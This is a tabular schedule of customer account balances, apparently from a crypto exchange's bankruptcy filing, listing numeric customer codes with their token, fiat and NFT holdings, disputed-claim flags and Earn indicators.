| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07389933 | | DOGE[121.25021909], USD[0.00] | | |
| 07389935 | | NFT (366129499706879902/Entrance Voucher #2049)[1], USD[1.86] | | |
| 07389937 | | DOGE[1], TRX[2], USD[0.81], USDT[.00259631] | Yes | |
| 07389938 | | BTC[.493064] | | |
| 07389939 | | BRZ[4], BTC[.07145435], CUSDT[4], DOGE[6], ETH[.57192946], GRT[.00299403], LTC[11.17700013], SHIB[13], TRX[7451.83244163], USD[0.00], USDT[0] | Yes | |
| 07389948 | | CUSDT[3], DOGE[315.79709005], SHIB[837883.19518872], USD[0.00] | | |
| 07389951 | | CUSDT[1], USD[0.00], USDT[0] | | |
| 07389953 | | BRZ[2], CUSDT[5], TRX[1], USD[0.01] | | |
| 07389954 | | USD[0.00] | | |
| 07389955 | | BTC[.0008822], CUSDT[4], DOGE[252.85005421], USD[0.00] | Yes | |
| 07389956 | | USD[10.16] | | |
| 07389957 | | GRT[4.64889085], USD[0.00] | | |
| 07389958 | | CUSDT[2], SHIB[893250.51729818], USD[0.00] | | |
| 07389960 | | USD[0.00] | | |
| 07389961 | | NFT (401671733247362151/FTX - Off The Grid Miami #1026)[1], USD[0.00] | Yes | |
| 07389962 | | USD[10.00] | | |
| 07389963 | | DOGE[2], LINK[.00706414], TRX[1], USD[0.01] | | |
| 07389966 | Contingent, Disputed | BAT[.00004009], BCH[.00000188], BTC[0.00077324], CAD[0.00], CUSDT[2.00805662], DOGE[.00001495], EUR[0.00], GBP[0.00], GRT[.00001791], LTC[0.00000314], PAXG[.00000001], SOL[.00000247], SUSHI[.00104152], TRX[.00000008], USD[0.00], USDT[0.00000023], YFI[.00000001] | | |
| 07389967 | | DOGE[29.15232105], TRX[1], USD[0.00] | | |
| 07389968 | | AAVE[.06830999], AVAX[.52216295], BAT[93.59794863], BCH[.39071163], BF_POINT[200], BRZ[2], BTC[.01115717], CUSDT[78.65266052], DOGE[787.14442286], ETH[.11808569], ETHW[.11694376], GRT[154.13024557], LINK[6.7752936], LTC[1.28736516], MATIC[16.36071822], MKR[.00738446], NFT (303769324220849103/Pop Art #16)[1], NFT (328386663296141588/ETH#2)[1], NFT (339719701670992826/Rogue Circuits #470)[1], NFT (351028082564355513/Pop Art #30)[1], NFT (353473529098961715/Solar Plexus Chakra - #3.3)[1], NFT (367209579103224203/Divine Soldier #6028)[1], NFT (401616694136995453/SOLYETIS #2591)[1], NFT (428179890760572901/Wild Woman)[1], NFT (437658851443003851/Rogue Circuits #4340)[1], NFT (449986461411939551/Pop Art #8)[1], NFT (451809296058117484/Voxel City #8)[1], NFT (459269850585806744/ApexDucks Halloween #1150)[1], NFT (461877432809118294/#291)[1], NFT (475445094560098487/CoinBarbarian)[1], NFT (518482089968148632/Rainbow FTX Logo)[1], NFT (536443110430174491/DarkPunk #8891)[1], SHIB[4134075.67007627], SOL[16.07439659], SUSHI[93.32388617], TRX[1232.61888275], UNI[2.14870882], USD[-19.16], USDT[1.11030948], YFI[.00680371] | Yes | |
| 07389969 | | BAT[1], BRZ[1], BTC[.73814124], DOGE[7746.60795791], USD[0.00] | | |
| 07389971 | | BCH[.00000087], USD[0.01], USDT[0] | Yes | |
| 07389977 | | BTC[.00010496], DOGE[1], USD[5.00] | | |
| 07389978 | | BTC[0], GRT[12143.41659563] | | |
| 07389979 | | USD[10.00] | | |
| 07389980 | | BTC[0.00006425] | | |
| 07389982 | | BAT[1], BRZ[1], CUSDT[4], DOGE[8673.92073847], ETH[1.05608984], ETHW[1.05563676], GRT[1.00498957], TRX[5], USD[0.38] | Yes | |
| 07389988 | | ETH[0], USD[0.00] | | |
| 07389989 | | ETH[.00287897], ETHW[.00287897], USD[0.00] | | |
| 07389991 | | BAT[1.0165555], BCH[0], BRZ[5.07952967], BTC[0], CUSDT[8], DOGE[19.83787891], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[3], USD[0.00], USDT[1.10056077], YFI[0] | Yes | |
| 07389993 | | CUSDT[2], DOGE[17656.83696176], TRX[2], USD[0.00] | | |
| 07389994 | | USD[10.00] | | |
| 07389996 | | CUSDT[2], ETH[.00756453], ETHW[.00756453], USD[14.73] | | |
| 07389997 | | AUD[0.00], BAT[0], BRZ[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], EUR[0.00], GBP[0.00], LINK[0], LTC[0], PAXG[0], SGD[0.00], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000001], YFI[0] | Yes | |
| 07389999 | | TRX[115.21244368], USD[0.00] | | |
| 07390000 | | CUSDT[1], DOGE[448.74469303], TRX[1], USD[0.00] | | |
| 07390001 | | TRX[1], USD[0.19] | | |
| 07390003 | | SUSHI[0], USD[0.01], USDT[0] | | |
| 07390005 | | DOGE[961.59694231], USD[0.00] | Yes | |
| 07390007 | | SOL[0], USD[0.00] | | |
| 07390008 | | USD[0.43] | | |
| 07390009 | | BCH[.2042169], BRZ[5], BTC[.00566403], CUSDT[10382.3355726], DOGE[16413.83202526], ETH[2.20276333], ETHW[2.20276333], GRT[1], LTC[4.34090883], SHIB[97483495.18489408], TRX[16], USD[27.24], USDT[0.00000001] | | |
| 07390011 | | USD[25001.18], USDT[0.00000001] | Yes | |
| 07390012 | | DOGE[154.65000075], USD[0.00] | | |
| 07390017 | | CUSDT[1], USD[0.00] | | |
| 07390018 | | USD[10.00] | | |
| 07390021 | | DOGE[1.00723163], USD[0.00] | Yes | |
| 07390022 | | ETH[.00003642], ETHW[3.22854175], SHIB[3], TRX[1], USD[11797.87] | Yes | |
| 07390035 | | NFT (533765478418770367/Coachella x FTX Weekend 1 #12429)[1] | | |
| 07390043 | | BAT[.00000921], BRZ[2], CUSDT[1], SHIB[1], TRX[7], USD[0.57], USDT[0.00000921] | Yes | |
| 07390045 | | ALGO[3.33060616], ETH[.00089573], ETHW[.00088208], GRT[8.05905095], SUSHI[.00004172], TRX[19.3618621], USD[0.00] | Yes | |
| 07390049 | | BTC[0], ETH[0], USD[0.00] | | |
| 07390054 | | CUSDT[1], DOGE[6.75316913], USD[0.00] | | |
| 07390055 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07390057 | | USD[0.00] | | |
| 07390058 | | BTC[0], ETH[.03079932], ETHW[.03079932] | | |
| 07390060 | | USD[10.00] | | |
| 07390061 | | BTC[0], DOGE[0], ETH[.17514315], ETHW[.17514315], USD[0.00], USDT[0] | | |
| 07390069 | | SHIB[2], SOL[5.49333721], USD[104.03] | Yes | |
| 07390071 | | BRZ[1], CUSDT[6], DOGE[1], LINK[.2127518], SOL[.00034552], TRX[759.63373147], USD[0.00] | Yes | |
| 07390073 | | USD[0.41], USDT[.008774] | | |
| 07390075 | | BTC[.00089977], CUSDT[2], USD[0.00] | Yes | |
| 07390076 | | TRX[.07] | | |
| 07390077 | | DOGE[0], SHIB[1], SOL[0], TRX[1], USD[597.04] | Yes | |
| 07390083 | | CUSDT[5], ETH[.02108049], ETHW[.02108049], TRX[1], USD[0.01] | | |
| 07390084 | | BTC[.000202], CUSDT[5], DOGE[0], LTC[0.05806716], SHIB[329281.04421889], TRX[1], USD[0.00] | | |
| 07390087 | | BTC[0.00035612], ETH[.00518577], ETHW[.00518577], LTC[0.26367208], TRX[1], USD[0.00] | | |
| 07390088 | | BTC[0], DOGE[65], ETH[0], SHIB[16793.95703125], USD[0.00] | | |
| 07390089 | | SUSHI[.62416881], USD[0.00] | | |
| 07390099 | | BTC[0], ETH[0], ETHW[0.03844293], LTC[0], SOL[0], USD[0.00] | | |
| 07390100 | | CUSDT[2], USD[0.90], USDT[0] | | |
| 07390104 | | DOGE[2], TRX[1239.34571771], USD[0.00] | Yes | |
| 07390108 | | BRZ[3], CUSDT[5], DOGE[1182.14180874], USD[0.00] | | |
| 07390110 | | BTC[0.00000806], LTC[.00316], SOL[.08], USD[0.08] | | |
| 07390113 | | CUSDT[3], USD[7.12], USDT[0] | | |
| 07390115 | | BTC[.04315578], CUSDT[2], DOGE[549.02788777], TRX[1146.10075402], USD[0.00] | Yes | |
| 07390122 | | SHIB[256937.30729701], USD[0.00] | | |
| 07390123 | | USD[10.00] | | |
| 07390130 | | USD[10.00] | | |
| 07390131 | | TRX[72.97621449], USD[0.00] | | |
| 07390137 | | USD[10.00] | | |
| 07390143 | | BAT[2.01578801], BRZ[1], TRX[1], USD[0.00], USDT[1.04964954] | Yes | |
| 07390144 | | BTC[0], CUSDT[2], DOGE[2], ETH[0], ETHW[0], USD[10.00], USDT[0.00000011] | | |
| 07390145 | | USD[10.97] | Yes | |
| 07390147 | | BRZ[2], CUSDT[5116.69171154], DOGE[2621.1489255], ETH[.80796351], ETHW[.80762403], GRT[618.6860605], LINK[44.70499381], NFT [389942401448247040/Entrance Voucher #4370][1], SOL[11.73910286], TRX[12406.01033703], USD[173.35] | Yes | |
| 07390149 | | DOGE[13570.88538467], LTC[.00018109], SHIB[1915709.81226053], TRX[1], USD[0.00] | | |
| 07390152 | | BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], USD[0.10] | | |
| 07390156 | | BAT[10.87162719], BRZ[17.47771661], CUSDT[83.87031583], GRT[1.00152613], SOL[.0000929], TRX[4], UNI[.00000001], USD[0.00] | Yes | |
| 07390158 | | ETH[.0062968], ETHW[.0062968], USD[0.00] | | |
| 07390164 | | DOGE[135.63143622], USD[0.00] | | |
| 07390168 | | BTC[.00018953], USD[0.00] | | |
| 07390171 | | USD[10.00] | | |
| 07390172 | | USD[0.00], USDT[0] | | |
| 07390174 | | BRZ[2], CUSDT[5], DOGE[5.1243985], SHIB[224920.42919071], SOL[0], TRX[2], USD[0.01] | Yes | |
| 07390182 | | BAT[3], BRZ[2], CUSDT[6], TRX[1], USD[0.10] | | |
| 07390185 | | BRZ[1], CUSDT[2], DOGE[10456.71816743], TRX[1], USD[0.00] | | |
| 07390186 | | USD[0.00] | | |
| 07390190 | | DOGE[145.847263], GRT[3.85555866], USD[0.00] | | |
| 07390193 | | BTC[.00308037], CUSDT[5], DOGE[173.15181747], ETH[.02930318], ETHW[.02893692], LINK[1.05366972], PAXG[.0096933], TRX[1], USD[0.00] | Yes | |
| 07390194 | | CUSDT[24], DOGE[16.48567176], ETH[.0456919], ETHW[.0456919], LTC[1.05469921], TRX[94.54920847], USD[0.00] | | |
| 07390196 | | USD[0.00] | | |
| 07390197 | | BRZ[1], CUSDT[7], TRX[3], USD[0.01], USDT[0] | Yes | |
| 07390199 | | USD[10.00] | | |
| 07390200 | | LTC[0], USD[0.18], USDT[0] | | |
| 07390203 | | AVAX[0.07001959], BTC[0.00005456], ETH[.00006973], ETHW[.00506973], LINK[.09792214], LTC[.002], PAXG[.0000735], SOL[0.06906957], SUSHI[.45], UNI[.05], USD[14.21] | | |
| 07390204 | | BRZ[1], SHIB[1], SOL[0], USD[0.01], USDT[0] | | |
| 07390206 | | BTC[.00002227], CUSDT[1], DOGE[.85195653], SOL[.1988759], TRX[2], USD[0.00] | | |
| 07390207 | | USD[10.00] | | |
| 07390208 | | BAT[0], DOGE[0], SOL[0], USD[0.01] | | |
| 07390209 | | LINK[0], USD[0.01] | | |
| 07390211 | | BTC[.0001139], DOGE[1], ETH[.00033661], ETHW[56.57295714], GRT[2127.06161352], SOL[1.07338885], SUSHI[142.84504536], TRX[3], USD[664.34], USDT[0.00000004], YFI[.08895938] | Yes | |
| 07390217 | | BAT[2.03349492], BCH[1.43005709], BRZ[13.58227894], CUSDT[68.11019718], DOGE[10029.42670461], ETH[6.85496878], ETHW[6.85259848], GRT[835.99038611], SHIB[65], SOL[242.24002225], TRX[47.09502059], USD[96.82], USDT[1.05099868] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07390218 | | CUSDT[2], DOGE[930.44427914], USD[10.02] | | |
| 07390225 | | SHIB[1], SUSHI[11.17098162], USD[1.15] | Yes | |
| 07390226 | | USD[1.47], USDT[0.00000001] | Yes | |
| 07390227 | | CUSDT[2], DOGE[3880.93543907], SUSHI[.00067446], USD[0.00] | Yes | |
| 07390228 | | DOGE[1], TRX[5127.10740136], USD[10.00] | | |
| 07390229 | | BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07390231 | | BAT[1.0165555], BRZ[2], CUSDT[8], DOGE[5.06856718], GRT[2686.42840768], MATIC[.00000001], TRX[3], USD[5.35] | Yes | |
| 07390232 | | USD[10.00] | | |
| 07390233 | | BRZ[1], CUSDT[3], GRT[1.00019173], NFT (512955515934033280/Sloth #2444)[1], SHIB[56.3015326], TRX[315.84765422], USD[0.00] | Yes | |
| 07390235 | | BTC[0.00000001], CUSDT[16], DOGE[1], ETH[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07390240 | | USD[10.00] | | |
| 07390241 | | BTC[.00050565], SHIB[1], USD[0.00] | | |
| 07390242 | | USD[546.93] | Yes | |
| 07390243 | | CUSDT[1], DOGE[0], TRX[0], USD[0.00] | | |
| 07390246 | | ETHW[.094982], USD[0.49] | | |
| 07390251 | | BRZ[1], DOGE[525.80337316], USD[43.22] | | |
| 07390252 | | NFT (323224606017717176/Entrance Voucher #3517)[1], USD[0.00] | | |
| 07390253 | | TRX[.000003], USD[44.18], USDT[24] | | |
| 07390257 | | TRX[.228], USD[434.34] | | |
| 07390261 | | BTC[0], ETHW[.00027345], USD[5.96], USDT[0] | | |
| 07390264 | | DOGE[.44], NFT (304319411911549412/David #864)[1], NFT (319566698207670486/David #1000)[1], NFT (337460985747103686/David #441)[1], NFT (351841450464345083/David #880)[1], NFT (364650748568569355/David #891)[1], NFT (389821881241207269/David #348)[1], NFT (417702249142946199/Cadet 1232)[1], NFT (426991047667719508/David #197)[1], NFT (475753703018161674/David #870)[1], NFT (521798244084484210/David #778)[1], SOL[0.00000001], USD[0.00], USDT[0] | | |
| 07390270 | | BTC[0], GRT[0] | | |
| 07390271 | | USD[10.00] | | |
| 07390274 | | USD[10.00] | | |
| 07390276 | | DOGE[13.944], LINK[0], SOL[0.00000001], USD[0.30], USDT[0] | | |
| 07390279 | | BTC[0], USD[0.00] | | |
| 07390282 | | NFT (339258918032014276/Series 1: Capitals #433)[1], NFT (355997903707281861/Humpty Dumpty #1432)[1], NFT (379269284211297316/Series 1: Capitals #431)[1], NFT (389366945042673794/FTX - Off The Grid Miami #533)[1], NFT (409252181405870058/FTX Crypto Cup 2022 Key #62)[1], NFT (428948668741758857/Entrance Voucher #1504)[1], NFT (448072149805157551/Bahrain Ticket Stub #1848)[1], NFT (481346235747702008/FTX - Off The Grid Miami #525)[1], NFT (492304729575990582/Humpty Dumpty #1428)[1], NFT (531875529712908032/Montreal Ticket Stub #77)[1], NFT (549423362251460292/Entrance Voucher #1503)[1], NFT (573607341222342997/Hungary Ticket Stub #199)[1], NFT (574697379876608419/Series 1: Wizards #388)[1], USD[3198.46] | Yes | |
| 07390287 | | DOGE[.743], ETHW[2.00687374], USD[0.00], USDT[0.00000411] | | |
| 07390296 | | USD[10.00] | | |
| 07390297 | | SOL[0], USD[0.89] | | |
| 07390299 | | USDT[1.248] | | |
| 07390308 | | ETH[0], MATIC[2.82309274] | | |
| 07390310 | | AAVE[.005], TRX[.000002], USD[469.36], USDT[22.5268432] | | |
| 07390317 | | USD[9.17], USDT[0] | | |
| 07390323 | | CUSDT[235.28446801], DOGE[115.20766905], TRX[102.13704053], USD[0.00] | | |
| 07390329 | | BF_POINT[300], BTC[.000042], ETH[.00137841], ETHW[0.00137840], SOL[0.08716000], USD[0.00] | | |
| 07390334 | | BTC[.00021512], USD[0.00] | | |
| 07390337 | | AVAX[0], SOL[0], USD[0.00] | | |
| 07390340 | | BTC[.01853863], CUSDT[1], TRX[1], USD[0.00], USDT[1.02543197] | Yes | |
| 07390342 | | USDT[4.5966] | | |
| 07390345 | | USDT[1.2198726] | | |
| 07390350 | | BTC[.01426831], GRT[652.37965], SUSHI[79.924], UNI[24.97625] | | |
| 07390351 | | ETH[.00005], ETHW[.00005], SOL[.00390793], SUSHI[.419], USD[0.29] | | |
| 07390354 | | BTC[0.00003987], USD[0.00] | | |
| 07390357 | | BTC[0.00006855], DOGE[.75], ETH[.000034], ETHW[.000034], NFT (329059141677272112/8rising Sky Challenge - Coin #569)[1], NFT (371709493515008599/Coachella x FTX Weekend 2 #26621)[1], SHIB[534001, SOL[.00686498], TRX[.148], USD[0.00], USDT[0] | | |
| 07390360 | | BTC[0.00000090], ETH[0.00645194], ETHW[0.00645194], SOL[0.92383391], USD[0.40] | | |
| 07390362 | | BTC[0], SOL[0], USD[7.29], USDT[0.00000026] | | |
| 07390369 | | BTC[.0149104] | | |
| 07390373 | | USDT[1.906246] | | |
| 07390374 | | USD[0.00] | | |
| 07390379 | | USD[0.00] | | |
| 07390395 | | SOL[.007], USD[1913.03] | | |
| 07390396 | | BCH[0], BTC[0], ETH[0], SUSHI[3.33914996], USD[0.00] | | |
| 07390401 | | CUSDT[1], DOGE[333.3854546], USD[0.00] | | |
| 07390410 | | LINK[0], SHIB[18.8422225], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07390414 | | BTC[0], DOGE[0], ETH[0], SOL[0], TRX[0], USD[0.00], USDT[0.01782196] | | |
| 07390422 | | DOGE[1], USD[0.00] | | |
| 07390430 | | GRT[5469.072], SUSHI[.466], TRX[.884], USD[0.00] | | |
| 07390436 | | CUSDT[1], DOGE[478.76540047], USD[0.00] | | |
| 07390440 | | BTC[0], USD[0.01] | | |
| 07390442 | | USD[10.00] | | |
| 07390444 | | USD[0.00] | | |
| 07390448 | | USD[13734.04] | | |
| 07390449 | | DAI[9.94506742], USD[0.00] | | |
| 07390450 | | CUSDT[1], DOGE[164.69825255], USD[0.00] | Yes | |
| 07390454 | | DOGE[81137.103], ETH[1.560438], ETHW[1.560438], SUSHI[.122], USD[269.18] | | |
| 07390458 | | BTC[0], LTC[.00699533] | | |
| 07390463 | | BTC[0], SUSHI[4165.272], USD[0.00] | | |
| 07390468 | | USD[10.08] | | |
| 07390474 | | SOL[14.472], USD[3437.54], USDT[1.62472200] | | |
| 07390475 | | BTC[.00015741] | | |
| 07390476 | | USD[1002.00] | | |
| 07390477 | | NFT (35639775379008154431/Limited First #1)[1], NFT (446149428640328931/Money is Nothing but Money #1)[1], NFT (446309376714161420/Limited First #2)[1], SOL[.00874472], TRX[.000002], USD[0.00], USDT[0.00851400] | | |
| 07390479 | | DOGE[413.73735267], SHIB[1610606.72920133], TRX[573.40599001], USD[0.00] | | |
| 07390481 | | BCH[.0004], BTC[0], ETH[0], SOL[.00340127], USDT[1.88771288] | | |
| 07390483 | | ETH[.00000001], ETHW[0], USD[0.07] | | |
| 07390485 | Contingent, Disputed | USD[0.00] | | |
| 07390488 | | BRZ[2], BTC[.02605808], CUSDT[4], DOGE[10582.12642419], ETH[.59308036], ETHW[.59308036], TRX[1], USD[0.00] | | |
| 07390490 | | BTC[0], LINK[40.23594736], MATIC[.00414074], NFT (307567172204417029/JungleCats #2448)[1], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07390491 | | BRZ[1], CUSDT[1], DOGE[1356.24905994], TRX[1], USD[0.00], USDT[0.00000704] | | |
| 07390494 | | BRZ[1], GRT[9.22372272], USD[0.00] | | |
| 07390495 | | DOGE[1], YFI[0] | | |
| 07390499 | | CUSDT[2], TRX[1], USD[44.85] | | |
| 07390500 | | CUSDT[0], DOGE[0], TRX[0], USD[0.00] | | |
| 07390501 | | USD[10.00] | | |
| 07390502 | | DOGE[1], USD[0.00] | Yes | |
| 07390503 | | CUSDT[1], SOL[102.83886348], USD[0.00] | Yes | |
| 07390507 | | USD[0.00] | | |
| 07390512 | | TRX[168.08462859], USD[0.00] | | |
| 07390514 | | CUSDT[3], DOGE[747.60535168], SHIB[376732.97166968], USD[0.00] | | |
| 07390516 | | CUSDT[3], SHIB[1], USD[0.01] | | |
| 07390525 | | CUSDT[554.61968182], TRX[947.93003628], USD[18.44] | Yes | |
| 07390527 | | USD[10.00] | | |
| 07390528 | | DOGE[1.00000868], SOL[.00005645], TRX[1], USD[0.00] | | |
| 07390531 | | CUSDT[1], DOGE[616.18601904], TRX[3], USD[0.00] | | |
| 07390537 | | USD[0.00] | | |
| 07390538 | | CUSDT[1], USD[38.73] | | |
| 07390540 | | BTC[.00000005], USD[0.00] | | |
| 07390544 | Contingent, Disputed | GRT[0], TRX[0], USD[0.01] | | |
| 07390545 | | USD[10.00] | | |
| 07390548 | | SHIB[7], TRX[2], USD[0.00] | | |
| 07390550 | | BAT[0], BCH[0], BTC[0], DOGE[58.97052749], GRT[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | | |
| 07390552 | | CUSDT[1], DOGE[1.00002307], ETH[0], TRX[2], USD[0.01] | | |
| 07390554 | | USD[0.01] | | |
| 07390555 | | TRX[70.45770016], USD[0.00] | | |
| 07390561 | | CUSDT[16], DOGE[1], SHIB[2], USD[5.31] | | |
| 07390566 | | AVAX[2.49182954], BAT[1], DOGE[0], ETH[0], NFT (499649420544253935/Sickos #10)[1], SHIB[16224516.33282682], SOL[16.76064270], USD[583.39], USDT[0] | Yes | |
| 07390571 | | USD[10.00] | | |
| 07390572 | | CUSDT[2], TRX[1445.98814128], USD[0.19], USDT[0] | Yes | |
| 07390579 | | BAT[19.56099105], CUSDT[2], SHIB[1.29898058], SOL[0], SUSHI[0.00001990], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07390587 | | DOGE[1.0000131], TRX[1], USD[0.01] | | |
| 07390592 | | BAT[0], BRZ[1], BTC[0], CUSDT[2], DOGE[2], ETH[0], SOL[0], SUSHI[0], TRX[1], USD[0.00], USDT[0.00000001] | | |
| 07390594 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07390595 | | BTC[0], CUSDT[5], DOGE[506.60632769], TRX[2], USD[0.00] | | |
| 07390602 | | USD[0.00] | | |
| 07390604 | | USD[0.00], USDT[0] | | |
| 07390606 | | USD[10.00] | | |
| 07390608 | | CUSDT[2], USD[0.00] | | |
| 07390612 | | CUSDT[4], USD[0.00] | | |
| 07390614 | | LINK[6.65098699], TRX[8332.03071411], USD[34.68] | | |
| 07390616 | | BAT[4.60023065], CUSDT[3], DOGE[1703.54786101], GRT[25.90146242], SHIB[244828.00844656], TRX[1378.67067076], USD[5.00] | | |
| 07390621 | | USD[0.00] | | |
| 07390628 | | USD[10.00] | | |
| 07390631 | | BAT[.00004735], BRZ[1], CUSDT[1], DOGE[0.41589064], LINK[.00048758], LTC[.0000424], TRX[1.00382734], USD[0.59] | | |
| 07390632 | | CUSDT[1], DOGE[3.0032641], USD[0.00] | | |
| 07390633 | | DOGE[41.08625483], GBP[1.42], USD[0.00] | | |
| 07390635 | | CUSDT[1], DOGE[303.15491697], USD[0.00] | Yes | |
| 07390636 | | USD[0.01] | | |
| 07390638 | | CUSDT[1], DOGE[2], SHIB[5822982.36645962], TRX[997.87439448], USD[0.15] | | |
| 07390640 | | CUSDT[1], USD[0.01] | | |
| 07390642 | | BTC[.00095057], CUSDT[2], DOGE[478.31665774], TRX[1], USD[0.00] | | |
| 07390643 | | BRZ[1], CUSDT[4], USD[0.01] | Yes | |
| 07390644 | | USD[0.38] | | |
| 07390645 | | CUSDT[2], DOGE[0], LTC[0], USD[0.00] | Yes | |
| 07390648 | | BRZ[1], CUSDT[2], TRX[1], USD[0.61] | Yes | |
| 07390650 | | BAT[200.55419211], DOGE[4], GRT[233.72469446], SOL[11.44687499], USD[0.00] | | |
| 07390651 | | DOGE[13.7478418], USD[0.00] | | |
| 07390665 | | USD[10.99] | Yes | |
| 07390668 | | BRZ[5], BTC[0], CUSDT[41], DOGE[8], ETH[0], GRT[1], SHIB[22], SOL[0.00000001], TRX[16], USD[0.00], USDT[1] | | |
| 07390670 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07390684 | | BTC[.00148673], CUSDT[2], DOGE[96.95792809], TRX[1], USD[0.00] | Yes | |
| 07390693 | | DOGE[0], USD[0.01] | | |
| 07390694 | | MATIC[49.95], USD[0.97] | | |
| 07390695 | | BF_POINT[300], USD[0.64] | Yes | |
| 07390697 | | CUSDT[1], DOGE[156.78502353], TRX[2], USD[0.00] | | |
| 07390707 | | CUSDT[10], DOGE[4919.57811878], ETH[.00053232], ETHW[.00053232], SHIB[16681351.8940748], TRX[3], USD[6.87] | Yes | |
| 07390709 | | BAT[102.68984713], CUSDT[3], DAI[10.88653581], DOGE[4.02241864], TRX[1082.57707007], USD[0.00] | Yes | |
| 07390715 | | BAT[1], BF_POINT[400], USD[0.01], USDT[0] | Yes | |
| 07390718 | | BRZ[2], USD[14.30] | | |
| 07390723 | | USD[0.00] | Yes | |
| 07390726 | | TRX[10108.09477624], USD[0.00] | | |
| 07390730 | | CUSDT[1], DOGE[201.4811249], SOL[.59325442], SUSHI[1.61514108], TRX[97.55693954], USD[0.00] | Yes | |
| 07390731 | | BAT[0], ETH[0], LINK[0], SHIB[0], SOL[0], USD[0.00], WBTC[0] | | |
| 07390733 | | BTC[.00002035], CUSDT[2], DOGE[1095.45278173], USD[0.63] | | |
| 07390736 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07390738 | | DOGE[202.37031154], USD[0.00] | | |
| 07390739 | | BAT[.00039582], DOGE[.00005099], SOL[0], USD[0.01] | Yes | |
| 07390740 | | CUSDT[1], USD[0.00] | | |
| 07390743 | | DOGE[1.00002788], USD[0.95] | | |
| 07390745 | | CUSDT[2], TRX[1], USD[0.01] | Yes | |
| 07390746 | | ETH[.00000001], ETHW[0], USD[0.00], USDT[0] | | |
| 07390748 | | BTC[0], DOGE[0], ETH[0], LTC[0], SOL[0], TRX[0] | | |
| 07390755 | | BRZ[1], CUSDT[18], DOGE[1], ETH[.00289769], GBP[0.00], GRT[1], NFT (298387708473503445/2974 Floyd Norman - OKC 3-0006)[1], SHIB[20], USD[0.00], USDT[0.00000492] | Yes | |
| 07390761 | | DOGE[0], NFT (304762115662235487/Imola Ticket Stub #32)[1], SOL[0.00021752], USD[0.00] | Yes | |
| 07390764 | | USD[27.06] | | |
| 07390765 | | SOL[.25] | | |
| 07390768 | | USD[0.00] | | |
| 07390771 | | DOGE[348.5307523], USD[0.00] | | |
| 07390773 | | CUSDT[2], GRT[.0004671], SUSHI[8.77179129], USD[0.00] | | |
| 07390776 | | DOGE[9.77638111], USD[5.00] | | |
| 07390783 | | BRZ[1], CUSDT[2], DOGE[0], ETH[0], TRX[377.85284755] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07390784 | | CUSDT[1], USD[0.00] | | |
| 07390789 | | USD[0.00] | | |
| 07390796 | | USD[0.01] | | |
| 07390799 | | DOGE[1], USD[0.00] | Yes | |
| 07390804 | | DOGE[1], LTC[.07040461], USD[0.00] | | |
| 07390807 | | USD[0.00], USDT[0] | | |
| 07390818 | | DOGE[173.97251823], GRT[0], SOL[0], USD[0.01] | Yes | |
| 07390820 | | DOGE[1], TRX[886.15154692], USD[0.00] | | |
| 07390822 | | USD[10.00] | | |
| 07390823 | | BRZ[2], CUSDT[3], DOGE[1.06054432], ETH[.22447582], ETHW[.22447582], TRX[4], USD[0.13] | | |
| 07390825 | | DOGE[1.00989319], USD[0.00] | | |
| 07390836 | | BAT[0], BRZ[1], CUSDT[2], DOGE[0], ETH[.00000001], GRT[.00117265], LINK[0], TRX[0], USD[0.19], USDT[0.00000001] | Yes | |
| 07390840 | | NFT (450214320119500317/Entrance Voucher #2177)[1] | | |
| 07390842 | | DOGE[1.00004033], ETH[0.06634418], ETHW[0.06634418], USD[100.45] | | |
| 07390843 | | AAVE[.15637596], CUSDT[289.14134665], DOGE[1], ETH[.32710715], ETHW[.32694569], LTC[.0632752], NFT (422945295795882281/Entrance Voucher #2593)[1], SHIB[2], SOL[.43432707], TRX[21.65557838], UNI[3.52220987], USD[0.00] | Yes | |
| 07390845 | | BRZ[1.00000002], CUSDT[8], DOGE[0], GRT[0], SHIB[1], TRX[3], USD[0.01], USDT[0] | Yes | |
| 07390850 | | SHIB[105260.32230924], USD[0.00] | Yes | |
| 07390852 | | CUSDT[1], SHIB[1], TRX[2], USD[0.00] | | |
| 07390854 | | DOGE[.34271692], USD[0.01] | | |
| 07390858 | | USD[10.00] | | |
| 07390861 | | GRT[.34661833], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.02717257] | | |
| 07390866 | | USD[0.01] | | |
| 07390867 | | SOL[.00004237], TRX[.00006], USDT[0.00000056] | | |
| 07390868 | | LTC[.0410547], USD[0.00] | | |
| 07390870 | | BAT[1], BRZ[5], BTC[0], CUSDT[5], DOGE[0], ETH[0], TRX[3], USD[0.00] | | |
| 07390871 | | BAT[5], BRZ[7], BTC[0], CUSDT[13], DOGE[3], ETH[0], GRT[3], PAXG[0], TRX[3], USD[0.00], USDT[0] | | |
